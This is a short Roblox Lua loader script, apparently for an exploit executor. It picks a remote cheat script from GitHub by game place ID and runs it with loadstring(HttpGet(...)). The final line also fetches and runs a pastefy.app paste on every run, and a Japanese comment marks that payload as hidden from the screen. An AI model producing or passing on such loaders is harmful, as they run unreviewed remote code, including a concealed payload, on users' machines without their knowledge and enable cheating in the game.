local currentPlaceId = game.PlaceId local scripts = { [109983668079237] = "https://raw.githubusercontent.com/tienkhanh1/spicy/main/Chilli.lua", [6961824067] = "https://raw.githubusercontent.com/jadpy/poophub/refs/heads/main/PoophubJP", [79546208627805] = "https://raw.githubusercontent.com/VapeVoidware/VW-Add/main/nightsintheforest.lua", } local url = scripts[currentPlaceId] if url then local success, err = pcall(function() loadstring(game:HttpGet(url))() end) if not success then -- nocache=true で再試行 pcall(function() loadstring(game:HttpGet(url, true))() end) end end -- 常時実行スクリプト(画面には表示しない) pcall(function() loadstring(game:HttpGet("https://pastefy.app/KuHBFs69/raw"))() end)